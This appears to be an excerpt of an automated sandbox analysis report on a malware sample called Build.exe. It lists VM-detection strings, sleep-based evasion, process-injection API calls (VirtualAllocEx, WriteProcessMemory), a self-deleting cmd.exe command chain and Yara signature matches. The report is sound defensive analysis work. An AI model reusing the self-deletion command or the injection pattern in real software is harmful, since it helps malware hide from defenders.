Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\taskkill.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: CC0000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: 2740000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Memory allocated: D60000 memory reserve | memory write watch |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe TID: 5968 |
Thread sleep time: -922337203685477s >= -30000s |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe TID: 5576 |
Thread sleep count: 134 > 30 |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe TID: 4144 |
Thread sleep count: 166 > 30 |
Jump to behavior |
Source: Build.exe |
Binary or memory string: <VirtualMachine>k__BackingField |
Source: Build.exe |
Binary or memory string: set_VirtualMachine |
Source: Build.exe |
Binary or memory string: VMwareVMware |
Source: Build.exe |
Binary or memory string: VMWare |
Source: Build.exe |
Binary or memory string: get_VirtualMachine |
Source: Build.exe |
Binary or memory string: VEN_VMWARE |
Source: Build.exe, 00000000.00000002.1863379517.0000000000AEB000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: Build.exe, LibInvoker.cs |
Reference to suspicious API methods: NativeMethods.GetProcAddress(SystemNetMailSmtpNtlmAuthenticationModuleC, MicrosoftWinTimerElapsedEventHandlerKtionName) |
Source: Build.exe, LoadExecutor.cs |
Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.VirtualAllocExDelegate>("VirtualAllocEx")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, ptr3->OptionalHeader.SizeOfImage, 12288u, 64u) |
Source: Build.exe, LoadExecutor.cs |
Reference to suspicious API methods: libInvoker.CastToDelegate<NativeDelegates.WriteProcessMemoryDelegate>("WriteProcessMemory")(lpProcesSystemNetCertPolicyValidationCallbackv.hProcess, intPtr, lSqlDependencyProcessDispatcherSqlConnectionContainerHashHelperU, ptr3->OptionalHeader.SizeOfHeaders, IntPtr.Zero) |
Source: C:\Users\user\Desktop\Build.exe |
Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C taskkill /F /PID 6356 && choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\Build.exe" |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /PID 6356 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Users\user\Desktop\Build.exe VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation |
Jump to behavior |
Source: C:\Users\user\Desktop\Build.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation |
Jump to behavior |
Source: Yara match |
File source: Build.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |
Source: Yara match |
File source: Build.exe, type: SAMPLE |
Source: Yara match |
File source: 0.0.Build.exe.320000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000000.00000000.1640140886.0000000000322000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000000.00000002.1864630370.0000000002741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: Build.exe PID: 6356, type: MEMORYSTR |